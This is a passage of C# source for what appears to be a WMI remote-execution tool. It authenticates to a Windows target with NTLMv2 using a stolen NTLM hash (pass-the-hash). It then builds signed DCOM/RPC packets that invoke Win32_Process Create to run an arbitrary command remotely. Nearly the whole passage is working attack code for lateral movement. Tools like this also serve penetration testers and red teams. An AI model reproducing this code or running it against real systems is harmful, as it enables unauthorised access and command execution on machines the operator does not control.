452 | Auth_Username_Bytes = Encoding.Unicode.GetBytes(username);
453 | Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length);
454 | Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] };
455 | Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length);
456 | Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] };
457 | Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length);
458 | Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] };
459 | Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
460 | Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64);
461 | Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64);
462 | Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64);
463 | Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88);
464 | HMAC_MD5 = new HMACMD5();
465 | HMAC_MD5.Key = NTLM_hash_bytes;
466 | Username_And_Target = username.ToUpper();
467 | Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target);
468 | Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray();
469 | NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes);
470 | r = new Random();
471 | Client_Challenge_Bytes = new byte[8];
472 | r.NextBytes(Client_Challenge_Bytes);
473 |
474 | Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
475 | .Concat(WMI_Target_Time_Bytes)
476 | .Concat(Client_Challenge_Bytes)
477 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
478 | .Concat(WMI_Target_Details)
479 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
480 |
481 | Server_Challenge_And_Security_Blob_Bytes = WMI_NTLM_Challenge.Concat(Security_Blob_Bytes).ToArray();
482 | HMAC_MD5.Key = NTLMv2_hash;
483 | NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes);
484 | Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response);
485 | byte[] Clignt_Signing_Constant = new byte[] { 0x73, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x74, 0x6f, 0x20, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x2d, 0x74, 0x6f, 0x2d, 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x20, 0x73, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x6d, 0x61, 0x67, 0x69, 0x63, 0x20, 0x63, 0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x74, 0x00 };
486 | MD5CryptoServiceProvider MD5_crypto = new MD5CryptoServiceProvider();
487 | byte[] Client_Signing_Key = MD5_crypto.ComputeHash(Session_Base_Key.Concat(Clignt_Signing_Constant).ToArray());
488 | NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray();
489 | NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length);
490 | NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] };
491 | WMI_Session_Key_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88);
492 | WMI_Session_Key_Length = new byte[] { 0x00, 0x00 };
493 | WMI_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 };
494 | NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
495 | .Concat(Auth_LM_Offset)
496 | .Concat(NTLMv2_Response_Length)
497 | .Concat(NTLMv2_Response_Length)
498 | .Concat(Auth_NTLM_Offset)
499 | .Concat(Auth_Domain_Length)
500 | .Concat(Auth_Domain_Length)
501 | .Concat(Auth_Domain_offset)
502 | .Concat(Auth_Username_Length)
503 | .Concat(Auth_Username_Length)
504 | .Concat(Auth_Username_Offset)
505 | .Concat(Auth_Hostname_Length)
506 | .Concat(Auth_Hostname_Length)
507 | .Concat(Auth_Hostname_Offset)
508 | .Concat(WMI_Session_Key_Length)
509 | .Concat(WMI_Session_Key_Length)
510 | .Concat(WMI_Session_Key_Offset)
511 | .Concat(WMI_Negotiate_Flags)
512 | .Concat(Auth_Domain_Bytes)
513 | .Concat(Auth_Username_Bytes)
514 | .Concat(Auth_Hostname_Bytes)
515 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
516 | .Concat(NTLMv2_Response).ToArray();
517 |
518 | HMAC_MD5.Key = Client_Signing_Key;
519 | Sequence_Number = new byte[] { 0x00, 0x00, 0x00, 0x00 };
520 | Packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response);
521 | Packet_RPC["RPCAUTH3_CallID"] = new byte[] { 0x02, 0x00, 0x00, 0x00 };
522 | Packet_RPC["RPCAUTH3_AuthLevel"] = new byte[] { 0x04 };
523 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
524 | WMI_Client_Random_Port_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length);
525 | WMI_Client_Random_Port_Stream.Flush();
526 |
527 | Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x83 }, 76, 16, 4, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x03, 0x00 }, Object_UUID);
528 | OrderedDictionary Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID, new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 });
529 | OrderedDictionary Packet_NTLMSSP_Verifier = WMIExec.NTLMSSPVerifier(4, new byte[] { 0x04 }, Sequence_Number);
530 | byte[] Rem_Query_Interface = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface);
531 | byte[] NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier);
532 | HMAC_MD5.Key = Client_Signing_Key;
533 | byte[] RPC_Sign = Sequence_Number.Concat(Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC))
534 | .Concat(Rem_Query_Interface)
535 | .Concat(Utilities.GetByteRange(NTLMSSP_Verifier, 0, 11)).ToArray();
536 |
537 | byte[] RPC_Signature = HMAC_MD5.ComputeHash(RPC_Sign);
538 | RPC_Signature = Utilities.GetByteRange(RPC_Signature, 0, 7);
539 | Packet_NTLMSSP_Verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_Signature;
540 | NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier);
541 |
542 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC)
543 | .Concat(Rem_Query_Interface)
544 | .Concat(NTLMSSP_Verifier).ToArray();
545 |
546 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send);
547 |
548 | if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) == "05-00-00-00")
549 | {
550 | output.AppendLine(String.Format("{0} WMI access denied on {1}", Output_Username, Target_Long));
551 | Console.WriteLine(output.ToString());
552 | Environment.Exit(0);
553 | }
554 | else if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) != "05-00-00-00")
555 | {
556 | string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] });
557 | string[] Error_Code_Array = Error_Code.Split('-');
558 | Error_Code = string.Join("", Error_Code_Array);
559 | output.AppendLine(String.Format("Error Code: 0x{0}", Error_Code.ToString()));
560 | Console.WriteLine(output.ToString());
561 | Environment.Exit(0);
562 | }
563 | else if (WMI_Client_Receive[2] == 2)
564 | {
565 | WMI_Data = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
566 | OXID_Index = WMI_Data.IndexOf(OXID);
567 | OXID_Bytes_Index = OXID_Index / 2;
568 | Object_UUID2 = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 16, OXID_Bytes_Index + 31);
569 | WMI_Client_Stage = "AlterContext";
570 | }
571 | else
572 | {
573 | output.AppendLine("An Unkonwn Error Occured");
574 | Console.WriteLine(output.ToString());
575 | Environment.Exit(0);
576 | }
577 |
578 | //Moving on to Command Execution
579 | int Request_Split_Index = 5500;
580 | string WMI_Client_Stage_Next = "";
581 | bool Request_Split = false;
582 |
583 | while (WMI_Client_Stage != "exit")
584 | {
585 | if (debugging) { output.AppendLine(WMI_Client_Stage); }
586 | if (WMI_Client_Receive[2] == 3)
587 | {
588 | string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] });
589 | string[] Error_Code_Array = Error_Code.Split('-');
590 | Error_Code = string.Join("", Error_Code_Array);
591 | output.AppendLine(String.Format("Execution failed with error code: 0x{0}", Error_Code.ToString()));
592 | WMI_Client_Stage = "exit";
593 | }
594 |
595 | switch (WMI_Client_Stage)
596 | {
597 | case "AlterContext":
598 | {
599 | switch (Sequence_Number[0])
600 | {
601 | case 0:
602 | {
603 | Alter_Context_Call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
604 | Alter_Context_Context_ID = new byte[] { 0x02, 0x00 };
605 | Alter_Context_UUID = new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 };
606 | WMI_Client_Stage_Next = "Request";
607 | }
608 | break;
609 | case 1:
610 | {
611 | Alter_Context_Call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
612 | Alter_Context_Context_ID = new byte[] { 0x03, 0x00 };
613 | Alter_Context_UUID = new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 };
614 | WMI_Client_Stage_Next = "Request";
615 | }
616 | break;
617 | case 6:
618 | {
619 | Alter_Context_Call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
620 | Alter_Context_Context_ID = new byte[] { 0x04, 0x00 };
621 | Alter_Context_UUID = new byte[] { 0x99, 0xdc, 0x56, 0x95, 0x8c, 0x82, 0xcf, 0x11, 0xa3, 0x7e, 0x00, 0xaa, 0x00, 0x32, 0x40, 0xc7 };
622 | WMI_Client_Stage_Next = "Request";
623 | }
624 | break;
625 | }
626 | Packet_RPC = WMIExec.RPCAlterContext(Assoc_Group, Alter_Context_Call_ID, Alter_Context_Context_ID, Alter_Context_UUID);
627 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC);
628 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send);
629 | WMI_Client_Stage = WMI_Client_Stage_Next;
630 | }
631 | break;
632 | case "Request":
633 | {
634 | switch (Sequence_Number[0])
635 | {
636 | case 0:
637 | {
638 | Sequence_Number = new byte[] { 0x01, 0x00, 0x00, 0x00 };
639 | Request_Flags = new byte[] { 0x83 };
640 | Request_Auth_Padding = 12;
641 | Request_Call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 };
642 | Request_Context_ID = new byte[] { 0x02, 0x00 };
643 | Request_Opnum = new byte[] { 0x03, 0x00 };
644 | Request_UUID = Object_UUID2;
645 | Hostname_Length = BitConverter.GetBytes(Auth_Hostname.Length + 1);
646 | WMI_Client_Stage_Next = "AlterContext";
647 |
648 | if (Convert.ToBoolean(Auth_Hostname.Length % 2))
649 | {
650 | Auth_Hostname_Bytes = Auth_Hostname_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
651 | }
652 | else
653 | {
654 | Auth_Hostname_Bytes = Auth_Hostname_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
655 | }
656 |
657 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
658 | .Concat(Causality_ID_Bytes)
659 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
660 | .Concat(Hostname_Length)
661 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
662 | .Concat(Hostname_Length)
663 | .Concat(Auth_Hostname_Bytes)
664 | .Concat(Process_ID_Bytes)
665 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
666 | }
667 | break;
668 | case 1:
669 | {
670 | Sequence_Number = new byte[] { 0x02, 0x00, 0x00, 0x00 };
671 | Request_Flags = new byte[] { 0x83 };
672 | Request_Auth_Padding = 8;
673 | Request_Call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 };
674 | Request_Context_ID = new byte[] { 0x03, 0x00 };
675 | Request_Opnum = new byte[] { 0x03, 0x00 };
676 | Request_UUID = IPID;
677 | WMI_Client_Stage_Next = "Request";
678 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
679 | .Concat(Causality_ID_Bytes)
680 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
681 | }
682 | break;
683 | case 2:
684 | {
685 | Sequence_Number = new byte[] { 0x03, 0x00, 0x00, 0x00 };
686 | Request_Flags = new byte[] { 0x83 };
687 | Request_Auth_Padding = 0;
688 | Request_Call_ID = new byte[] { 0x05, 0x00, 0x00, 0x00 };
689 | Request_Context_ID = new byte[] { 0x03, 0x00 };
690 | Request_Opnum = new byte[] { 0x06, 0x00 };
691 | Request_UUID = IPID;
692 | WMI_Namespace_Length = BitConverter.GetBytes(Target_Short.Length + 14);
693 | WMI_Namespace_Unicode = Encoding.Unicode.GetBytes("\\\\" + Target_Short + "\\root\\cimv2");
694 | WMI_Client_Stage_Next = "Request";
695 |
696 | if (Convert.ToBoolean(Target_Short.Length % 2))
697 | {
698 | WMI_Namespace_Unicode = WMI_Namespace_Unicode.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
699 | }
700 | else
701 | {
702 | WMI_Namespace_Unicode = WMI_Namespace_Unicode.Concat(new byte[] { 0x00, 0x0 }).ToArray();
703 |
704 | }
705 |
706 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
707 | .Concat(Causality_ID_Bytes)
708 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
709 | .Concat(WMI_Namespace_Length)
710 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
711 | .Concat(WMI_Namespace_Length)
712 | .Concat(WMI_Namespace_Unicode)
713 | .Concat(new byte[] { 0x04, 0x00, 0x02, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x2d, 0x00, 0x55, 0x00, 0x53, 0x00, 0x2c, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
714 |
715 | }
716 | break;
717 | case 3:
718 | {
719 | Sequence_Number = new byte[] { 0x04, 0x00, 0x00, 0x00 };
720 | Request_Flags = new byte[] { 0x83 };
721 | Request_Auth_Padding = 8;
722 | Request_Context_ID = new byte[] { 0x00, 0x00 };
723 | Request_Call_ID = new byte[] { 0x06, 0x00, 0x00, 0x00 };
724 | Request_Opnum = new byte[] { 0x05, 0x00 };
725 | Request_UUID = Object_UUID;
726 | WMI_Client_Stage_Next = "Request";
727 | WMI_Data = BitConverter.ToString(WMI_Client_Receive).Replace("-", "");
728 | OXID_Index = WMI_Data.IndexOf(OXID);
729 | OXID_Bytes_Index = OXID_Index / 2;
730 | IPID2 = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 16, OXID_Bytes_Index + 31);
731 | OrderedDictionary Packet_rem_release = WMIExec.DCOMRemRelease(Causality_ID_Bytes, Object_UUID2, IPID);
732 | Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_rem_release);
733 | }
734 | break;
735 | case 4:
736 | {
737 | Sequence_Number = new byte[] { 0x05, 0x00, 0x00, 0x00 };
738 | Request_Flags = new byte[] { 0x83 };
739 | Request_Auth_Padding = 4;
740 | Request_Context_ID = new byte[] { 0x00, 0x00 };
741 | Request_Call_ID = new byte[] { 0x07, 0x00, 0x00, 0x00 };
742 | Request_Opnum = new byte[] { 0x03, 0x00 };
743 | Request_UUID = Object_UUID;
744 | WMI_Client_Stage_Next = "Request";
745 | Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID2, new byte[] { 0x9e, 0xc1, 0xfc, 0xc3, 0x70, 0xa9, 0xd2, 0x11, 0x8b, 0x5a, 0x00, 0xa0, 0xc9, 0xb7, 0xc9, 0xc4 });
746 | Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface);
747 |
748 |
749 | }
750 | break;
751 | case 5:
752 | {
753 | Sequence_Number = new byte[] { 0x06, 0x00, 0x00, 0x00 };
754 | Request_Flags = new byte[] { 0x83 };
755 | Request_Auth_Padding = 4;
756 | Request_Call_ID = new byte[] { 0x08, 0x00, 0x00, 0x00 };
757 | Request_Context_ID = new byte[] { 0x00, 0x00 };
758 | Request_Opnum = new byte[] { 0x03, 0x00 };
759 | Request_UUID = Object_UUID;
760 | WMI_Client_Stage_Next = "AlterContext";
761 | Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID2, new byte[] { 0x83, 0xb2, 0x96, 0xb1, 0xb4, 0xba, 0x1a, 0x10, 0xb6, 0x9c, 0x00, 0xaa, 0x00, 0x34, 0x1d, 0x07 });
762 | Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface);
763 | }
764 | break;
765 | case 6:
766 | {
767 | Sequence_Number = new byte[] { 0x07, 0x00, 0x00, 0x00 };
768 | Request_Flags = new byte[] { 0x83 };
769 | Request_Auth_Padding = 0;
770 | Request_Context_ID = new byte[] { 0x04, 0x00 };
771 | Request_Call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 };
772 | Request_Opnum = new byte[] { 0x06, 0x00 };
773 | Request_UUID = IPID2;
774 | WMI_Client_Stage_Next = "Request";
775 |
776 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
777 | .Concat(Causality_ID_Bytes)
778 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
779 | }
780 | break;
781 | case 7:
782 | {
783 | Sequence_Number = new byte[] { 0x08, 0x00, 0x00, 0x00 };
784 | Request_Flags = new byte[] { 0x83 };
785 | Request_Auth_Padding = 0;
786 | Request_Context_ID = new byte[] { 0x04, 0x00 };
787 | Request_Call_ID = new byte[] { 0x10, 0x00, 0x00, 0x00 };
788 | Request_Opnum = new byte[] { 0x06, 0x00 };
789 | Request_UUID = IPID2;
790 | WMI_Client_Stage_Next = "Request";
791 |
792 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
793 | .Concat(Causality_ID_Bytes)
794 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
795 | }
796 | break;
797 | default:
798 | {
799 | if (Sequence_Number[0] >= 8)
800 | {
801 | Sequence_Number = new byte[] { 0x09, 0x00, 0x00, 0x00 };
802 | Request_Auth_Padding = 0;
803 | Request_Context_ID = new byte[] { 0x04, 0x00 };
804 | Request_Call_ID = new byte[] { 0x0b, 0x00, 0x00, 0x00 };
805 | Request_Opnum = new byte[] { 0x18, 0x00 };
806 | Request_UUID = IPID2;
807 | byte[] Stub_Length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1769), 0, 1);
808 | byte[] Stub_Length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1727), 0, 1); ;
809 | byte[] Stub_Length3 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1713), 0, 1);
810 | byte[] Command_Length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 93), 0, 1);
811 | byte[] Command_Length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 16), 0, 1);
812 | byte[] Command_Bytes = Encoding.UTF8.GetBytes(command);
813 |
814 | string Command_Padding_Check = Convert.ToString(Decimal.Divide(command.Length, 4));
815 | if (Command_Padding_Check.Contains(".75"))
816 | {
817 | Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00 }).ToArray();
818 | }
819 | else if (Command_Padding_Check.Contains(".5"))
820 | {
821 | Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray();
822 | }
823 | else if (Command_Padding_Check.Contains(".25"))
824 | {
825 | Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00 }).ToArray();
826 | }
827 | else
828 | {
829 | Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
830 | }
831 |
832 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
833 | .Concat(Causality_ID_Bytes)
834 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x06, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x63, 0x00, 0x72, 0x00, 0x65, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 })
835 | .Concat(Stub_Length)
836 | .Concat(new byte[] { 0x00, 0x00 })
837 | .Concat(Stub_Length)
838 | .Concat(new byte[] { 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0x81, 0xa6, 0x12, 0xdc, 0x7f, 0x73, 0xcf, 0x11, 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x12, 0xf8, 0x90, 0x45, 0x3a, 0x1d, 0xd0, 0x11, 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x00, 0x00, 0x00, 0x00 })
839 | .Concat(Stub_Length2)
840 | .Concat(new byte[] { 0x00, 0x00, 0x78, 0x56, 0x34, 0x12 })
841 | .Concat(Stub_Length3)
842 | .Concat(new byte[] { 0x00, 0x00, 0x02, 0x53, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x03, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x15, 0x01, 0x00, 0x00, 0x73, 0x01, 0x00, 0x00, 0x76, 0x02, 0x00, 0x00, 0xd4, 0x02, 0x00, 0x00, 0xb1, 0x03, 0x00, 0x00, 0x15, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x12, 0x04, 0x00, 0x80, 0x00, 0x5f, 0x5f, 0x50, 0x41, 0x52, 0x41, 0x4d, 0x45, 0x54, 0x45, 0x52, 0x53, 0x00, 0x00, 0x61, 0x62, 0x73, 0x74, 0x72, 0x61, 0x63, 0x74, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x00, 0x00, 0x73, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x00, 0x49, 0x6e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x00, 0x00, 0x02, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x00, 0x57, 0x69, 0x6e, 0x33, 0x32, 0x41, 0x50, 0x49, 0x7c, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x54, 0x68, 0x72, 0x65, 0x61, 0x64, 0x20, 0x46, 0x75, 0x6e, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x7c, 0x6c, 0x70, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x4c, 0x69, 0x6e, 0x65, 0x20, 0x00, 0x00, 0x4d, 0x61, 0x70, 0x70, 0x69, 0x6e, 0x67, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x73, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x80, 0x03, 0x08, 0x00, 0x00, 0x00, 0x37, 0x00, 0x00, 
